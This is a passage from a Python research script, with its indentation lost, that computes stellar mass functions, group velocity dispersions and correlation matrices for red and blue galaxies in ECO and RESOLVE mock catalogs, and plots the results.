red_singleton_counter += 1
else:
cen_stellar_mass = group.logmstar.loc[group.g_galtype\
.values == 1].values[0]
# Different velocity definitions
mean_cz_grp = np.round(np.mean(group.cz.values),2)
cen_cz_grp = group.cz.loc[group.g_galtype == 1].values[0]
# cz_grp = np.unique(group.grpcz.values)[0]
# Velocity difference
deltav = group.cz.values - len(group)*[mean_cz_grp]
# sigma = deltav[deltav!=0].std()
sigma = deltav.std()
red_sigma_arr.append(sigma)
red_cen_stellar_mass_arr.append(cen_stellar_mass)
blue_singleton_counter = 0
blue_sigma_arr = []
blue_cen_stellar_mass_arr = []
for key in blue_subset_grpids:
group = mock_pd.loc[mock_pd.groupid == key]
if len(group) == 1:
blue_singleton_counter += 1
else:
cen_stellar_mass = group.logmstar.loc[group.g_galtype\
.values == 1].values[0]
# Different velocity definitions
mean_cz_grp = np.round(np.mean(group.cz.values),2)
cen_cz_grp = group.cz.loc[group.g_galtype == 1].values[0]
# cz_grp = np.unique(group.grpcz.values)[0]
# Velocity difference
deltav = group.cz.values - len(group)*[mean_cz_grp]
# sigma = deltav[deltav!=0].std()
sigma = deltav.std()
blue_sigma_arr.append(sigma)
blue_cen_stellar_mass_arr.append(cen_stellar_mass)
mean_stats_red = bs(red_sigma_arr, red_cen_stellar_mass_arr,
statistic='mean', bins=np.linspace(0,250,6))
mean_stats_blue = bs(blue_sigma_arr, blue_cen_stellar_mass_arr,
statistic='mean', bins=np.linspace(0,250,6))
centers_red = 0.5 * (mean_stats_red[1][1:] + \
mean_stats_red[1][:-1])
centers_blue = 0.5 * (mean_stats_blue[1][1:] + \
mean_stats_blue[1][:-1])
return mean_stats_red, centers_red, mean_stats_blue, centers_blue
def get_err_data_mod(survey, path):
"""
Calculate error in data SMF from mocks
Parameters
----------
survey: string
Name of survey
path: string
Path to mock catalogs
Returns
---------
err_total: array
Standard deviation of phi values between all mocks and for all galaxies
err_red: array
Standard deviation of phi values between all mocks and for red galaxies
err_blue: array
Standard deviation of phi values between all mocks and for blue galaxies
"""
if survey == 'eco':
mock_name = 'ECO'
num_mocks = 8
min_cz = 3000
max_cz = 7000
mag_limit = -17.33
mstar_limit = 8.9
volume = 151829.26 # Survey volume without buffer [Mpc/h]^3
elif survey == 'resolvea':
mock_name = 'A'
num_mocks = 59
min_cz = 4500
max_cz = 7000
mag_limit = -17.33
mstar_limit = 8.9
volume = 13172.384 # Survey volume without buffer [Mpc/h]^3
elif survey == 'resolveb':
mock_name = 'B'
num_mocks = 104
min_cz = 4500
max_cz = 7000
mag_limit = -17
mstar_limit = 8.7
volume = 4709.8373 # Survey volume without buffer [Mpc/h]^3
phi_arr_total = []
phi_arr_red = []
phi_arr_blue = []
sig_arr_red = []
sig_arr_blue = []
cen_arr_red = []
cen_arr_blue = []
mean_cen_arr_red = []
mean_cen_arr_blue = []
new_sig_arr_red = []
new_sig_arr_blue = []
box_id_arr = np.linspace(5001,5008,8)
subset_counter = 0
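# Randomly draw 15 (box, mock) pairs instead of looping over all 64 mocks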
while subset_counter < 15:
print(subset_counter)
# for box in box_id_arr:
box = random.randint(5001,5008)
num = random.randint(0,7)
# box = int(box)
temp_path = path + '{0}/{1}_m200b_catls/'.format(box,
mock_name)
# for num in range(num_mocks):
filename = temp_path + '{0}_cat_{1}_Planck_memb_cat.hdf5'.format(
mock_name, num)
mock_pd = reading_catls(filename)
# Using the same survey definition as in mcmc smf, i.e. excluding the
# buffer
mock_pd = mock_pd.loc[(mock_pd.cz.values >= min_cz) & \
(mock_pd.cz.values <= max_cz) & (mock_pd.M_r.values <= mag_limit) &\
(mock_pd.logmstar.values >= mstar_limit)]
# ## Using best-fit found for old ECO data using optimize_hybridqm_eco.py
# Mstar_q = 10.39 # Msun/h
# Mh_q = 14.85 # Msun/h
# mu = 0.65
# nu = 0.16
## Using best-fit found for new ECO data using optimize_qm_eco.py
## for hybrid quenching model
Mstar_q = 10.49 # Msun/h
Mh_q = 14.03 # Msun/h
mu = 0.69
nu = 0.148
## Using best-fit found for new ECO data using optimize_qm_eco.py
## for halo quenching model
Mh_qc = 12.61 # Msun/h
Mh_qs = 13.5 # Msun/h
mu_c = 0.40
mu_s = 0.148
if quenching == 'hybrid':
theta = [Mstar_q, Mh_q, mu, nu]
f_red_c, f_red_s = hybrid_quenching_model(theta, mock_pd, 'nonvishnu')
elif quenching == 'halo':
theta = [Mh_qc, Mh_qs, mu_c, mu_s]
# halo counterpart of the quenching model (assumed to be defined earlier
# in this script)
f_red_c, f_red_s = halo_quenching_model(theta, mock_pd, 'nonvishnu')
mock_pd = assign_colour_label_mock(f_red_c, f_red_s, mock_pd)
# logmstar_red_max = mock_pd.logmstar.loc[mock_pd.colour_label == 'R'].max()
# logmstar_red_max_arr.append(logmstar_red_max)
# logmstar_blue_max = mock_pd.logmstar.loc[mock_pd.colour_label == 'B'].max()
# logmstar_blue_max_arr.append(logmstar_blue_max)
logmstar_arr = mock_pd.logmstar.values
# Measure SMF of mock using diff_smf function
max_total, phi_total, err_total, bins_total, counts_total = \
diff_smf(logmstar_arr, volume, h1_bool=False)
max_red, phi_red, err_red, bins_red, counts_red = \
diff_smf(mock_pd.logmstar.loc[mock_pd.colour_label.values == 'R'],
volume, h1_bool=False, colour_flag='R')
max_blue, phi_blue, err_blue, bins_blue, counts_blue = \
diff_smf(mock_pd.logmstar.loc[mock_pd.colour_label.values == 'B'],
volume, h1_bool=False, colour_flag='B')
phi_arr_total.append(phi_total)
phi_arr_red.append(phi_red)
phi_arr_blue.append(phi_blue)
sig_red, sig_blue, cen_red_sig, cen_blue_sig = \
get_deltav_sigma_mocks_qmcolour(survey, mock_pd)
new_mean_stats_red, new_centers_red, new_mean_stats_blue, \
new_centers_blue = \
get_sigma_per_group_mocks_qmcolour(survey, mock_pd)
sig_arr_red.append(sig_red)
sig_arr_blue.append(sig_blue)
cen_arr_red.append(cen_red_sig)
cen_arr_blue.append(cen_blue_sig)
new_sig_arr_red.append(new_centers_red)
new_sig_arr_blue.append(new_centers_blue)
mean_cen_arr_red.append(new_mean_stats_red[0])
mean_cen_arr_blue.append(new_mean_stats_blue[0])
subset_counter += 1
phi_arr_total = np.array(phi_arr_total)
phi_arr_red = np.array(phi_arr_red)
phi_arr_blue = np.array(phi_arr_blue)
sig_arr_red = np.array(sig_arr_red)
sig_arr_blue = np.array(sig_arr_blue)
cen_arr_red = np.array(cen_arr_red)
cen_arr_blue = np.array(cen_arr_blue)
new_sig_arr_red = np.array(new_sig_arr_red)
new_sig_arr_blue = np.array(new_sig_arr_blue)
mean_cen_arr_red = np.array(mean_cen_arr_red)
mean_cen_arr_blue = np.array(mean_cen_arr_blue)
# phi_arr_colour = np.append(phi_arr_red, phi_arr_blue, axis = 0)
# Covariance matrix for total phi (all galaxies)
# cov_mat = np.cov(phi_arr_total, rowvar=False) # default norm is N-1
# err_total = np.sqrt(cov_mat.diagonal())
# cov_mat_red = np.cov(phi_arr_red, rowvar=False) # default norm is N-1
# err_red = np.sqrt(cov_mat_red.diagonal())
# colour_err_arr.append(err_red)
# cov_mat_blue = np.cov(phi_arr_blue, rowvar=False) # default norm is N-1
# err_blue = np.sqrt(cov_mat_blue.diagonal())
# colour_err_arr.append(err_blue)
# corr_mat_red = cov_mat_red / np.outer(err_red , err_red)
# corr_mat_inv_red = np.linalg.inv(corr_mat_red)
# colour_corr_mat_inv.append(corr_mat_inv_red)
# corr_mat_blue = cov_mat_blue / np.outer(err_blue , err_blue)
# corr_mat_inv_blue = np.linalg.inv(corr_mat_blue)
# colour_corr_mat_inv.append(corr_mat_inv_blue)
phi_red_0 = phi_arr_red[:,0]
phi_red_1 = phi_arr_red[:,1]
phi_red_2 = phi_arr_red[:,2]
phi_red_3 = phi_arr_red[:,3]
phi_red_4 = phi_arr_red[:,4]
phi_blue_0 = phi_arr_blue[:,0]
phi_blue_1 = phi_arr_blue[:,1]
phi_blue_2 = phi_arr_blue[:,2]
phi_blue_3 = phi_arr_blue[:,3]
phi_blue_4 = phi_arr_blue[:,4]
dv_red_0 = sig_arr_red[:,0]
dv_red_1 = sig_arr_red[:,1]
dv_red_2 = sig_arr_red[:,2]
dv_red_3 = sig_arr_red[:,3]
dv_red_4 = sig_arr_red[:,4]
dv_blue_0 = sig_arr_blue[:,0]
dv_blue_1 = sig_arr_blue[:,1]
dv_blue_2 = sig_arr_blue[:,2]
dv_blue_3 = sig_arr_blue[:,3]
dv_blue_4 = sig_arr_blue[:,4]
av_grpcen_red_0 = mean_cen_arr_red[:,0]
av_grpcen_red_1 = mean_cen_arr_red[:,1]
av_grpcen_red_2 = mean_cen_arr_red[:,2]
av_grpcen_red_3 = mean_cen_arr_red[:,3]
av_grpcen_red_4 = mean_cen_arr_red[:,4]
av_grpcen_blue_0 = mean_cen_arr_blue[:,0]
av_grpcen_blue_1 = mean_cen_arr_blue[:,1]
av_grpcen_blue_2 = mean_cen_arr_blue[:,2]
av_grpcen_blue_3 = mean_cen_arr_blue[:,3]
av_grpcen_blue_4 = mean_cen_arr_blue[:,4]
combined_df = pd.DataFrame({'phi_red_0':phi_red_0, 'phi_red_1':phi_red_1,\
'phi_red_2':phi_red_2, 'phi_red_3':phi_red_3, 'phi_red_4':phi_red_4, \
'phi_blue_0':phi_blue_0, 'phi_blue_1':phi_blue_1,
'phi_blue_2':phi_blue_2, 'phi_blue_3':phi_blue_3,
'phi_blue_4':phi_blue_4, \
'dv_red_0':dv_red_0, 'dv_red_1':dv_red_1, 'dv_red_2':dv_red_2, \
'dv_red_3':dv_red_3, 'dv_red_4':dv_red_4, \
'dv_blue_0':dv_blue_0, 'dv_blue_1':dv_blue_1, 'dv_blue_2':dv_blue_2, \
'dv_blue_3':dv_blue_3, 'dv_blue_4':dv_blue_4, \
'av_grpcen_red_0':av_grpcen_red_0, 'av_grpcen_red_1':av_grpcen_red_1, \
'av_grpcen_red_2':av_grpcen_red_2, 'av_grpcen_red_3':av_grpcen_red_3, \
'av_grpcen_red_4':av_grpcen_red_4, 'av_grpcen_blue_0':av_grpcen_blue_0,\
'av_grpcen_blue_1':av_grpcen_blue_1, 'av_grpcen_blue_2':av_grpcen_blue_2, \
'av_grpcen_blue_3':av_grpcen_blue_3, 'av_grpcen_blue_4':av_grpcen_blue_4 })
# deltav_sig_colour = np.append(deltav_sig_red, deltav_sig_blue, axis = 0)
# cov_mat_colour = np.cov(phi_arr_colour,deltav_sig_colour, rowvar=False)
# err_colour = np.sqrt(cov_mat_colour.diagonal())
# corr_mat_colour = cov_mat_colour / np.outer(err_colour, err_colour)
# corr_mat_inv_colour = np.linalg.inv(corr_mat_colour)
# cov_mat_colour = np.cov(phi_arr_red,phi_arr_blue, rowvar=False)
# err_colour = np.sqrt(cov_mat_colour.diagonal())
# corr_mat_colour = cov_mat_colour / np.outer(err_colour, err_colour)
# corr_mat_inv_colour = np.linalg.inv(corr_mat_colour)
return combined_df
def get_err_data(survey, path):
"""
Calculate error in data SMF from mocks
Parameters
----------
survey: string
Name of survey
path: string
Path to mock catalogs
Returns
---------
err_total: array
Standard deviation of phi values between all mocks and for all galaxies
err_red: array
Standard deviation of phi values between all mocks and for red galaxies
err_blue: array
Standard deviation of phi values between all mocks and for blue galaxies
"""
if survey == 'eco':
mock_name = 'ECO'
num_mocks = 8
min_cz = 3000
max_cz = 7000
mag_limit = -17.33
mstar_limit = 8.9
volume = 151829.26 # Survey volume without buffer [Mpc/h]^3
elif survey == 'resolvea':
mock_name = 'A'
num_mocks = 59
min_cz = 4500
max_cz = 7000
mag_limit = -17.33
mstar_limit = 8.9
volume = 13172.384 # Survey volume without buffer [Mpc/h]^3
elif survey == 'resolveb':
mock_name = 'B'
num_mocks = 104
min_cz = 4500
max_cz = 7000
mag_limit = -17
mstar_limit = 8.7
volume = 4709.8373 # Survey volume without buffer [Mpc/h]^3
phi_arr_total = []
phi_arr_red = []
phi_arr_blue = []
sig_arr_red = []
sig_arr_blue = []
cen_arr_red = []
cen_arr_blue = []
mean_cen_arr_red = []
mean_cen_arr_blue = []
new_sig_arr_red = []
new_sig_arr_blue = []
box_id_arr = np.linspace(5001,5008,8)
for box in box_id_arr:
box = int(box)
temp_path = path + '{0}/{1}_m200b_catls/'.format(box,
mock_name)
for num in range(num_mocks):
filename = temp_path + '{0}_cat_{1}_Planck_memb_cat.hdf5'.format(
mock_name, num)
mock_pd = reading_catls(filename)
# Using the same survey definition as in mcmc smf, i.e. excluding the
# buffer
mock_pd = mock_pd.loc[(mock_pd.cz.values >= min_cz) & \
(mock_pd.cz.values <= max_cz) & (mock_pd.M_r.values <= mag_limit) &\
(mock_pd.logmstar.values >= mstar_limit)]
# ## Using best-fit found for old ECO data using optimize_hybridqm_eco.py
# Mstar_q = 10.39 # Msun/h
# Mh_q = 14.85 # Msun/h
# mu = 0.65
# nu = 0.16
## Using best-fit found for new ECO data using optimize_qm_eco.py
## for hybrid quenching model
Mstar_q = 10.49 # Msun/h
Mh_q = 14.03 # Msun/h
mu = 0.69
nu = 0.148
## Using best-fit found for new ECO data using optimize_qm_eco.py
## for halo quenching model
Mh_qc = 12.61 # Msun/h
Mh_qs = 13.5 # Msun/h
mu_c = 0.40
mu_s = 0.148
if quenching == 'hybrid':
theta = [Mstar_q, Mh_q, mu, nu]
f_red_c, f_red_s = hybrid_quenching_model(theta, mock_pd, 'nonvishnu')
elif quenching == 'halo':
theta = [Mh_qc, Mh_qs, mu_c, mu_s]
# halo counterpart of the quenching model (assumed to be defined earlier
# in this script)
f_red_c, f_red_s = halo_quenching_model(theta, mock_pd, 'nonvishnu')
mock_pd = assign_colour_label_mock(f_red_c, f_red_s, mock_pd)
# logmstar_red_max = mock_pd.logmstar.loc[mock_pd.colour_label == 'R'].max()
# logmstar_red_max_arr.append(logmstar_red_max)
# logmstar_blue_max = mock_pd.logmstar.loc[mock_pd.colour_label == 'B'].max()
# logmstar_blue_max_arr.append(logmstar_blue_max)
logmstar_arr = mock_pd.logmstar.values
# Measure SMF of mock using diff_smf function
max_total, phi_total, err_total, bins_total, counts_total = \
diff_smf(logmstar_arr, volume, h1_bool=False)
max_red, phi_red, err_red, bins_red, counts_red = \
diff_smf(mock_pd.logmstar.loc[mock_pd.colour_label.values == 'R'],
volume, h1_bool=False, colour_flag='R')
max_blue, phi_blue, err_blue, bins_blue, counts_blue = \
diff_smf(mock_pd.logmstar.loc[mock_pd.colour_label.values == 'B'],
volume, h1_bool=False, colour_flag='B')
phi_arr_total.append(phi_total)
phi_arr_red.append(phi_red)
phi_arr_blue.append(phi_blue)
sig_red, sig_blue, cen_red_sig, cen_blue_sig = \
get_deltav_sigma_mocks_qmcolour(survey, mock_pd)
new_mean_stats_red, new_centers_red, new_mean_stats_blue, \
new_centers_blue = \
get_sigma_per_group_mocks_qmcolour(survey, mock_pd)
sig_arr_red.append(sig_red)
sig_arr_blue.append(sig_blue)
cen_arr_red.append(cen_red_sig)
cen_arr_blue.append(cen_blue_sig)
new_sig_arr_red.append(new_centers_red)
new_sig_arr_blue.append(new_centers_blue)
mean_cen_arr_red.append(new_mean_stats_red[0])
mean_cen_arr_blue.append(new_mean_stats_blue[0])
phi_arr_total = np.array(phi_arr_total)
phi_arr_red = np.array(phi_arr_red)
phi_arr_blue = np.array(phi_arr_blue)
sig_arr_red = np.array(sig_arr_red)
sig_arr_blue = np.array(sig_arr_blue)
cen_arr_red = np.array(cen_arr_red)
cen_arr_blue = np.array(cen_arr_blue)
new_sig_arr_red = np.array(new_sig_arr_red)
new_sig_arr_blue = np.array(new_sig_arr_blue)
mean_cen_arr_red = np.array(mean_cen_arr_red)
mean_cen_arr_blue = np.array(mean_cen_arr_blue)
# phi_arr_colour = np.append(phi_arr_red, phi_arr_blue, axis = 0)
# Covariance matrix for total phi (all galaxies)
# cov_mat = np.cov(phi_arr_total, rowvar=False) # default norm is N-1
# err_total = np.sqrt(cov_mat.diagonal())
# cov_mat_red = np.cov(phi_arr_red, rowvar=False) # default norm is N-1
# err_red = np.sqrt(cov_mat_red.diagonal())
# colour_err_arr.append(err_red)
# cov_mat_blue = np.cov(phi_arr_blue, rowvar=False) # default norm is N-1
# err_blue = np.sqrt(cov_mat_blue.diagonal())
# colour_err_arr.append(err_blue)
# corr_mat_red = cov_mat_red / np.outer(err_red , err_red)
# corr_mat_inv_red = np.linalg.inv(corr_mat_red)
# colour_corr_mat_inv.append(corr_mat_inv_red)
# corr_mat_blue = cov_mat_blue / np.outer(err_blue , err_blue)
# corr_mat_inv_blue = np.linalg.inv(corr_mat_blue)
# colour_corr_mat_inv.append(corr_mat_inv_blue)
phi_red_0 = phi_arr_red[:,0]
phi_red_1 = phi_arr_red[:,1]
phi_red_2 = phi_arr_red[:,2]
phi_red_3 = phi_arr_red[:,3]
phi_red_4 = phi_arr_red[:,4]
phi_blue_0 = phi_arr_blue[:,0]
phi_blue_1 = phi_arr_blue[:,1]
phi_blue_2 = phi_arr_blue[:,2]
phi_blue_3 = phi_arr_blue[:,3]
phi_blue_4 = phi_arr_blue[:,4]
dv_red_0 = sig_arr_red[:,0]
dv_red_1 = sig_arr_red[:,1]
dv_red_2 = sig_arr_red[:,2]
dv_red_3 = sig_arr_red[:,3]
dv_red_4 = sig_arr_red[:,4]
dv_blue_0 = sig_arr_blue[:,0]
dv_blue_1 = sig_arr_blue[:,1]
dv_blue_2 = sig_arr_blue[:,2]
dv_blue_3 = sig_arr_blue[:,3]
dv_blue_4 = sig_arr_blue[:,4]
av_grpcen_red_0 = mean_cen_arr_red[:,0]
av_grpcen_red_1 = mean_cen_arr_red[:,1]
av_grpcen_red_2 = mean_cen_arr_red[:,2]
av_grpcen_red_3 = mean_cen_arr_red[:,3]
av_grpcen_red_4 = mean_cen_arr_red[:,4]
av_grpcen_blue_0 = mean_cen_arr_blue[:,0]
av_grpcen_blue_1 = mean_cen_arr_blue[:,1]
av_grpcen_blue_2 = mean_cen_arr_blue[:,2]
av_grpcen_blue_3 = mean_cen_arr_blue[:,3]
av_grpcen_blue_4 = mean_cen_arr_blue[:,4]
combined_df = pd.DataFrame({'phi_red_0':phi_red_0, 'phi_red_1':phi_red_1,\
'phi_red_2':phi_red_2, 'phi_red_3':phi_red_3, 'phi_red_4':phi_red_4, \
'phi_blue_0':phi_blue_0, 'phi_blue_1':phi_blue_1,
'phi_blue_2':phi_blue_2, 'phi_blue_3':phi_blue_3,
'phi_blue_4':phi_blue_4, \
'dv_red_0':dv_red_0, 'dv_red_1':dv_red_1, 'dv_red_2':dv_red_2, \
'dv_red_3':dv_red_3, 'dv_red_4':dv_red_4, \
'dv_blue_0':dv_blue_0, 'dv_blue_1':dv_blue_1, 'dv_blue_2':dv_blue_2, \
'dv_blue_3':dv_blue_3, 'dv_blue_4':dv_blue_4, \
'av_grpcen_red_0':av_grpcen_red_0, 'av_grpcen_red_1':av_grpcen_red_1, \
'av_grpcen_red_2':av_grpcen_red_2, 'av_grpcen_red_3':av_grpcen_red_3, \
'av_grpcen_red_4':av_grpcen_red_4, 'av_grpcen_blue_0':av_grpcen_blue_0,\
'av_grpcen_blue_1':av_grpcen_blue_1, 'av_grpcen_blue_2':av_grpcen_blue_2, \
'av_grpcen_blue_3':av_grpcen_blue_3, 'av_grpcen_blue_4':av_grpcen_blue_4 })
# deltav_sig_colour = np.append(deltav_sig_red, deltav_sig_blue, axis = 0)
# cov_mat_colour = np.cov(phi_arr_colour,deltav_sig_colour, rowvar=False)
# err_colour = np.sqrt(cov_mat_colour.diagonal())
# corr_mat_colour = cov_mat_colour / np.outer(err_colour, err_colour)
# corr_mat_inv_colour = np.linalg.inv(corr_mat_colour)
# cov_mat_colour = np.cov(phi_arr_red,phi_arr_blue, rowvar=False)
# err_colour = np.sqrt(cov_mat_colour.diagonal())
# corr_mat_colour = cov_mat_colour / np.outer(err_colour, err_colour)
# corr_mat_inv_colour = np.linalg.inv(corr_mat_colour)
return combined_df
def measure_all_smf(table, volume, data_bool, randint_logmstar=None):
"""
Calculates differential stellar mass function for all, red and blue galaxies
from mock/data
Parameters
----------
table: pandas Dataframe
Dataframe of either mock or data
volume: float
Volume of simulation/survey
cvar: float
Cosmic variance error
data_bool: Boolean
Data or mock
Returns
---------
3 multidimensional arrays of stellar mass, phi, total error in SMF and
counts per bin for all, red and blue galaxies
"""
colour_col = 'colour_label'
if data_bool:
logmstar_col = 'logmstar'
max_total, phi_total, err_total, bins_total, counts_total = \
diff_smf(table[logmstar_col], volume, h1_bool=False)
max_red, phi_red, err_red, bins_red, counts_red = \
diff_smf(table[logmstar_col].loc[table[colour_col] == 'R'],
volume, h1_bool=False, colour_flag='R')
max_blue, phi_blue, err_blue, bins_blue, counts_blue = \
diff_smf(table[logmstar_col].loc[table[colour_col] == 'B'],
volume, h1_bool=False, colour_flag='B')
else:
# logmstar_col = 'stellar_mass'
logmstar_col = '{0}'.format(randint_logmstar)
## Changed to 10**X because Behroozi mocks now have M* values in log
max_total, phi_total, err_total, bins_total, counts_total = \
diff_smf(10**(table[logmstar_col]), volume, h1_bool=True)
max_red, phi_red, err_red, bins_red, counts_red = \
diff_smf(10**(table[logmstar_col].loc[table[colour_col] == 'R']),
volume,h1_bool=True, colour_flag='R')
max_blue, phi_blue, err_blue, bins_blue, counts_blue = \
diff_smf(10**(table[logmstar_col].loc[table[colour_col] == 'B']),
volume, h1_bool=True, colour_flag='B')
return [max_total, phi_total, err_total, counts_total] , \
[max_red, phi_red, err_red, counts_red] , \
[max_blue, phi_blue, err_blue, counts_blue]
global model_init
global survey
global path_to_proc
global mf_type
global quenching
survey = 'eco'
machine = 'mac'
mf_type = 'smf'
quenching = 'hybrid'
dict_of_paths = cwpaths.cookiecutter_paths()
path_to_raw = dict_of_paths['raw_dir']
path_to_proc = dict_of_paths['proc_dir']
path_to_external = dict_of_paths['ext_dir']
path_to_data = dict_of_paths['data_dir']
if machine == 'bender':
halo_catalog = '/home/asadm2/.astropy/cache/halotools/halo_catalogs/'\
'vishnu/rockstar/vishnu_rockstar_test.hdf5'
elif machine == 'mac':
halo_catalog = path_to_raw + 'vishnu_rockstar_test.hdf5'
if survey == 'eco':
catl_file = path_to_proc + "gal_group_eco_data.hdf5"
elif survey == 'resolvea' or survey == 'resolveb':
catl_file = path_to_raw + "resolve/RESOLVE_liveJune2018.csv"
if survey == 'eco':
path_to_mocks = path_to_data + 'mocks/m200b/eco/'
elif survey == 'resolvea':
path_to_mocks = path_to_data + 'mocks/m200b/resolvea/'
elif survey == 'resolveb':
path_to_mocks = path_to_data + 'mocks/m200b/resolveb/'
catl, volume, z_median = read_data_catl(catl_file, survey)
catl = assign_colour_label_data(catl)
std_red_mocks, std_blue_mocks, centers_red_mocks, \
centers_blue_mocks = get_deltav_sigma_mocks_urcolour(survey, path_to_mocks)
std_red_mocks2, std_blue_mocks2, centers_red_mocks2, \
centers_blue_mocks2 = get_deltav_sigma_mocks_qmcolour_mod(survey, path_to_mocks)
std_red_data, centers_red_data, std_blue_data, centers_blue_data = \
get_deltav_sigma_data(catl)
phi_red_arr, phi_blue_arr = get_err_smf_mocks(survey, path_to_mocks)
corr_mat_combined_bool = True
if corr_mat_combined_bool:
phi_red_0 = phi_red_arr[:,0]
phi_red_1 = phi_red_arr[:,1]
phi_red_2 = phi_red_arr[:,2]
phi_red_3 = phi_red_arr[:,3]
phi_red_4 = phi_red_arr[:,4]
phi_blue_0 = phi_blue_arr[:,0]
phi_blue_1 = phi_blue_arr[:,1]
phi_blue_2 = phi_blue_arr[:,2]
phi_blue_3 = phi_blue_arr[:,3]
phi_blue_4 = phi_blue_arr[:,4]
dv_red_0 = std_red_mocks2[:,0]
dv_red_1 = std_red_mocks2[:,1]
dv_red_2 = std_red_mocks2[:,2]
dv_red_3 = std_red_mocks2[:,3]
dv_red_4 = std_red_mocks2[:,4]
dv_blue_0 = std_blue_mocks2[:,0]
dv_blue_1 = std_blue_mocks2[:,1]
dv_blue_2 = std_blue_mocks2[:,2]
dv_blue_3 = std_blue_mocks2[:,3]
dv_blue_4 = std_blue_mocks2[:,4]
combined_df = pd.DataFrame({'phi_red_0':phi_red_0, 'phi_red_1':phi_red_1,\
'phi_red_2':phi_red_2, 'phi_red_3':phi_red_3, 'phi_red_4':phi_red_4, \
'phi_blue_0':phi_blue_0, 'phi_blue_1':phi_blue_1,
'phi_blue_2':phi_blue_2, 'phi_blue_3':phi_blue_3,
'phi_blue_4':phi_blue_4, \
'dv_red_0':dv_red_0, 'dv_red_1':dv_red_1, 'dv_red_2':dv_red_2, \
'dv_red_3':dv_red_3, 'dv_red_4':dv_red_4, \
'dv_blue_0':dv_blue_0, 'dv_blue_1':dv_blue_1, 'dv_blue_2':dv_blue_2, \
'dv_blue_3':dv_blue_3, 'dv_blue_4':dv_blue_4})
# Correlation matrix of phi and deltav colour measurements combined
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
cmap = cm.get_cmap('Spectral')
cax = ax1.matshow(combined_df.corr(), cmap=cmap)
plt.gca().invert_yaxis()
plt.gca().xaxis.tick_bottom()
fig1.colorbar(cax)
plt.title(r'Combined \boldmath{$\Phi$} and \boldmath{$\sigma$} measurements using ZuMand15 colours')
plt.show()
if corr_mat_combined_bool:
phi_red_0 = phi_red_arr[:,0]
phi_red_1 = phi_red_arr[:,1]
phi_red_2 = phi_red_arr[:,2]
phi_red_3 = phi_red_arr[:,3]
phi_red_4 = phi_red_arr[:,4]
phi_blue_0 = phi_blue_arr[:,0]
phi_blue_1 = phi_blue_arr[:,1]
phi_blue_2 = phi_blue_arr[:,2]
phi_blue_3 = phi_blue_arr[:,3]
phi_blue_4 = phi_blue_arr[:,4]
dv_red_0 = std_red_mocks[:,0]
dv_red_1 = std_red_mocks[:,1]
dv_red_2 = std_red_mocks[:,2]
dv_red_3 = std_red_mocks[:,3]
dv_red_4 = std_red_mocks[:,4]
dv_blue_0 = std_blue_mocks[:,0]
dv_blue_1 = std_blue_mocks[:,1]
dv_blue_2 = std_blue_mocks[:,2]
dv_blue_3 = std_blue_mocks[:,3]
dv_blue_4 = std_blue_mocks[:,4]
combined_df = pd.DataFrame({'phi_red_0':phi_red_0, 'phi_red_1':phi_red_1,\
'phi_red_2':phi_red_2, 'phi_red_3':phi_red_3, 'phi_red_4':phi_red_4, \
'phi_blue_0':phi_blue_0, 'phi_blue_1':phi_blue_1,
'phi_blue_2':phi_blue_2, 'phi_blue_3':phi_blue_3,
'phi_blue_4':phi_blue_4, \
'dv_red_0':dv_red_0, 'dv_red_1':dv_red_1, 'dv_red_2':dv_red_2, \
'dv_red_3':dv_red_3, 'dv_red_4':dv_red_4, \
'dv_blue_0':dv_blue_0, 'dv_blue_1':dv_blue_1, 'dv_blue_2':dv_blue_2, \
'dv_blue_3':dv_blue_3, 'dv_blue_4':dv_blue_4})
# Correlation matrix of phi and deltav colour measurements combined
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
cmap = cm.get_cmap('Spectral')
cax = ax1.matshow(combined_df.corr(), cmap=cmap)
plt.gca().invert_yaxis()
plt.gca().xaxis.tick_bottom()
fig1.colorbar(cax)
plt.title(r'Combined \boldmath{$\Phi$} and \boldmath{$\sigma$} measurements')
plt.show()
else:
cov_mat_colour = np.cov(std_red_mocks, std_blue_mocks,
rowvar=False)
err_colour = np.sqrt(cov_mat_colour.diagonal())
corr_mat_colour = cov_mat_colour / np.outer(err_colour, err_colour)
corr_mat_inv_colour = np.linalg.inv(corr_mat_colour)
# Correlation matrix of just deltav measurements combined
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
cmap = cm.get_cmap('Spectral')
cax = ax1.matshow(corr_mat_colour, cmap=cmap)
plt.gca().invert_yaxis()
plt.gca().xaxis.tick_bottom()
fig1.colorbar(cax)
plt.title(r'Combined \boldmath{$\delta$}v measurements')
plt.show()
# Plot of spread in velocity dispersion of red and blue galaxies from data and
# mocks
fig2 = plt.figure()
for idx in range(len(centers_red_mocks)):
plt.scatter(centers_red_mocks[idx], std_red_mocks[idx],
c='indianred', s=80)
plt.scatter(centers_blue_mocks[idx], std_blue_mocks[idx],
c='cornflowerblue', s=80)
plt.scatter(centers_red_data, std_red_data, marker='*', c='darkred', s=80)
plt.scatter(centers_blue_data, std_blue_data, marker='*', c='darkblue', s=80)
plt.xlabel(r'$\mathbf{log\ M_{*,cen}}\ [\mathbf{M_{\odot}}]$', labelpad=15,
fontsize=25)
plt.ylabel(r'\boldmath$\sigma \left[km/s\right]$', labelpad=15,
fontsize=25)
plt.title(r'mocks vs. data $\sigma$')
plt.show()
## Histogram of red and blue sigma in bins of central stellar mass to see if the
## distribution of values to take std of is normal or lognormal
nrows = 2
ncols = 5
if survey == 'eco' or survey == 'resolvea':
red_stellar_mass_bins = np.linspace(8.6,11.5,6)
blue_stellar_mass_bins = np.linspace(8.6,10.5,6)
elif survey == 'resolveb':
red_stellar_mass_bins = np.linspace(8.4,11.0,6)
blue_stellar_mass_bins = np.linspace(8.4,10.4,6)
fig3, axs = plt.subplots(nrows, ncols)
for i in range(0, nrows, 1):
for j in range(0, ncols, 1):
if i == 0: # row 1 for all red bins
axs[i, j].hist(np.log10(std_red_mocks.T[j]), histtype='step', \
color='indianred', linewidth=4, linestyle='-') # first red bin
axs[i, j].set_title('[{0}-{1}]'.format(np.round(
red_stellar_mass_bins[j],2), np.round(
red_stellar_mass_bins[j+1],2)), fontsize=20)
k2, p = nt(np.log10(std_red_mocks.T[j]), nan_policy="omit")
axs[i, j].text(0.7, 0.7, "{0}".format(np.round(p, 2)),
transform=axs[i, j].transAxes)
else: # row 2 for all blue bins
axs[i, j].hist(np.log10(std_blue_mocks.T[j]), histtype='step', \
color='cornflowerblue', linewidth=4, linestyle='-')
axs[i, j].set_title('[{0}-{1}]'.format(np.round(
blue_stellar_mass_bins[j],2), np.round(
